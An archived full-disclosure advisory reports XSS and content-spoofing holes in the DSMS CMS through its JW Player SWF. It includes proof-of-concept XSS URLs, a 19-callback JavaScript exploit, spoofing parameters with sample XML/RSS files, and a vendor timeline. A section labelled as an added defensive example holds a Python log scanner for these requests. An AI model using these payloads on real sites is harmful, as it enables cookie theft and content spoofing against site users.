Message-ID: <010601cf2a98$b63bed50$9b7a6fd5@pc>
Date: Sat, 15 Feb 2014 23:55:29 +0200
From: "MustLive" <mustlive@...security.com.ua>
To: <submissions@...ketstormsecurity.org>, <full-disclosure@...ts.grok.org.uk>
Subject: XSS and CS vulnerabilities in DSMS

Hello list!

There are Cross-Site Scripting and Content Spoofing vulnerabilities in DSMS. 
This is a commercial CMS. It is used, in particular, at the government site 
dsmsu.gov.ua, the web site of the Ministry of Youth and Sport of Ukraine.

There are also other vulnerabilities in the system, about which I've 
informed the developers. None of the vulnerabilities were fixed.

-------------------------
Affected products:
-------------------------

Vulnerable are all versions of DSMS.

-------------------------
Affected vendors:
-------------------------

Strebul studio
http://strebul.com

----------
Details:
----------

Cross-Site Scripting (WASC-08):

http://site/templates/default/js/jwplayer/player.swf?playerready=alert(document.cookie)

http://site/templates/default/js/jwplayer/player.swf?displayclick=link&link=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B&file=1.jpg

Cross-Site Scripting (WASC-08):

If, on a page of the site that embeds jwplayer.swf (player.swf), there is a 
possibility (via HTML Injection) to include JS code with a callback function, 
and there are 19 such functions in total, then it is possible to conduct an 
XSS attack. I.e. JS callbacks can be used for an XSS attack.

Example of exploit:

<script type="text/javascript" src="jwplayer.js"></script>
<div id="container">...</div>
<script type="text/javascript">
jwplayer("container").setup({
  flashplayer: "jwplayer.swf",
  file: "1.flv",
  autostart: true,
  height: 300,
  width: 480,
  events: {
    onReady: function() { alert(document.cookie); },
    onComplete: function() { alert(document.cookie); },
    onBufferChange: function() { alert(document.cookie); },
    onBufferFull: function() { alert(document.cookie); },
    onError: function() { alert(document.cookie); },
    onFullscreen: function() { alert(document.cookie); },
    onMeta: function() { alert(document.cookie); },
    onMute: function() { alert(document.cookie); },
    onPlaylist: function() { alert(document.cookie); },
    onPlaylistItem: function() { alert(document.cookie); },
    onResize: function() { alert(document.cookie); },
    onBeforePlay: function() { alert(document.cookie); },
    onPlay: function() { alert(document.cookie); },
    onPause: function() { alert(document.cookie); },
    onBuffer: function() { alert(document.cookie); },
    onSeek: function() { alert(document.cookie); },
    onIdle: function() { alert(document.cookie); },
    onTime: function() { alert(document.cookie); },
    onVolume: function() { alert(document.cookie); }
  }
});
</script>

Content Spoofing (WASC-12):

The SWF file of JW Player accepts arbitrary addresses in the parameters file and 
image, which allows spoofing of the flash content, i.e. by setting addresses of 
video (audio) and/or image files from another site.

http://site/templates/default/js/jwplayer/player.swf?file=1.flv&backcolor=0xFFFFFF&screencolor=0xFFFFFF

http://site/templates/default/js/jwplayer/player.swf?file=1.flv&image=1.jpg

The SWF file of JW Player accepts arbitrary addresses in the parameter config, 
which allows spoofing of the flash content, i.e. by setting the address of a 
config file from another site (the parameters file and image in the XML file 
accept arbitrary addresses). To load a config file from another site, that 
site needs to have a crossdomain.xml.

http://site/templates/default/js/jwplayer/player.swf?config=1.xml

1.xml

<config>
  <file>1.flv</file>
  <image>1.jpg</image>
</config>

The SWF file of JW Player accepts arbitrary addresses in the parameter 
playlistfile, which allows spoofing of the flash content, i.e. by setting the 
address of a playlist file from another site (the parameters media:content and 
media:thumbnail in the XML file accept arbitrary addresses). To load a playlist 
file from another site, that site needs to have a crossdomain.xml.

http://site/templates/default/js/jwplayer/player.swf?playlistfile=1.rss

http://site/templates/default/js/jwplayer/player.swf?playlistfile=1.rss&playlist.position=right&playlist.size=200

1.rss

<rss version="2.0" xmlns:media="http://search.yahoo.com/mrss/">
  <channel>
    <title>Example playlist</title>
    <item>
      <title>Video #1</title>
      <description>First video.</description>
      <media:content url="1.flv" duration="5" />
      <media:thumbnail url="1.jpg" />
    </item>
    <item>
      <title>Video #2</title>
      <description>Second video.</description>
      <media:content url="2.flv" duration="5" />
      <media:thumbnail url="2.jpg" />
    </item>
  </channel>
</rss>
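The two classes of request described above (JS callback and link parameters carrying script, and file/image/config/playlistfile parameters pointing at another site) can be turned into simple detection rules for a web server's access log. The following script is an added defensive example written for this archive page; it is not code from the advisory, from DSMS or from JW Player. The parameter names come from the advisory; the log format, the placeholder host name "site", the constructed sample log lines and the identifier regex are assumptions made for the example.

```python
"""Flag suspicious requests to a JW Player SWF in web-server access logs.

Added defensive example (not part of the advisory). It encodes the request
patterns the advisory describes as detection rules and runs them over
constructed sample log lines.
"""
import re
from urllib.parse import unquote_plus, urlsplit

# Host that legitimately serves the player (assumption: the advisory's
# placeholder "site"); media or config loaded from any other host is flagged.
SITE_HOST = "site"

# Parameter the advisory shows carrying a JS callback name.
CALLBACK_PARAMS = {"playerready"}
# Parameters the advisory shows accepting arbitrary addresses.
RESOURCE_PARAMS = {"file", "image", "config", "playlistfile", "link"}

# A legitimate callback value is a bare JS function name such as
# "onPlayerReady" or "ns.ready" (assumption); parentheses, quotes or
# operators mean the value is code rather than a name.
JS_IDENT = re.compile(r"^[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)*$")
SCRIPT_SCHEMES = ("data:", "javascript:", "vbscript:")

# Combined-log-style line; only the request target is needed (constructed).
LOG_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/\d\.\d"')


def parse_query(query):
    """Split a query string on '&' only (a data: URL may contain ';')."""
    pairs = []
    for chunk in query.split("&"):
        if chunk:
            name, _, value = chunk.partition("=")
            pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs


def classify_target(target):
    """Return a list of finding strings for one request target (path?query)."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith(".swf"):
        return []
    findings = []
    for name, value in parse_query(parts.query):
        value = value.strip()
        if name in CALLBACK_PARAMS:
            if not JS_IDENT.match(value):
                findings.append(f"js-in-callback:{name}")
        elif name in RESOURCE_PARAMS:
            if value.lower().startswith(SCRIPT_SCHEMES):
                findings.append(f"script-scheme:{name}")
            else:
                host = urlsplit(value).hostname  # None for relative paths
                if host and host != SITE_HOST:
                    findings.append(f"offsite-resource:{name}={host}")
    return findings


def scan_log(lines):
    """Return [(line_no, target, findings)] for lines that trigger a rule."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = LOG_RE.search(line)
        if m:
            findings = classify_target(m.group(1))
            if findings:
                hits.append((n, m.group(1), findings))
    return hits


# Constructed sample log lines: one benign same-site request, the two XSS
# requests from the advisory, an off-site config (other-site.example is a
# made-up host), and a benign callback name.
SAMPLE_LOG = [
    '10.0.0.1 - - [15/Feb/2014:23:55:29 +0200] "GET /templates/default/js/jwplayer/player.swf?file=1.flv&image=1.jpg HTTP/1.1" 200 512',
    '10.0.0.2 - - [15/Feb/2014:23:55:30 +0200] "GET /templates/default/js/jwplayer/player.swf?playerready=alert(document.cookie) HTTP/1.1" 200 512',
    '10.0.0.3 - - [15/Feb/2014:23:55:31 +0200] "GET /templates/default/js/jwplayer/player.swf?displayclick=link&link=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B&file=1.jpg HTTP/1.1" 200 512',
    '10.0.0.4 - - [15/Feb/2014:23:55:32 +0200] "GET /templates/default/js/jwplayer/player.swf?config=http://other-site.example/1.xml HTTP/1.1" 200 512',
    '10.0.0.5 - - [15/Feb/2014:23:55:33 +0200] "GET /templates/default/js/jwplayer/player.swf?playerready=onPlayerReady HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for line_no, target, findings in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: {', '.join(findings)}  <- {target}")
```

Relative values such as file=1.flv are left alone, since those are how the player is normally used; only script schemes and hosts other than the site's own are reported. A callback value that is not a plain function name is flagged even when it is not obviously malicious, so expect to tune the identifier rule against the site's real embeds before alerting on it.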

------------
Timeline:
------------

2013.11.04 - informed the administrators of the government site. No response, 
no fix.
2013.11.13 - announced at my site.
2013.11.18 - informed the developers about vulnerabilities in the CMS and at 
dsmsu.gov.ua. They promised to fix the holes in the CMS and at the web site, 
but didn't do it.
2014.02.15 - disclosed at my site (http://websecurity.com.ua/6860/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 
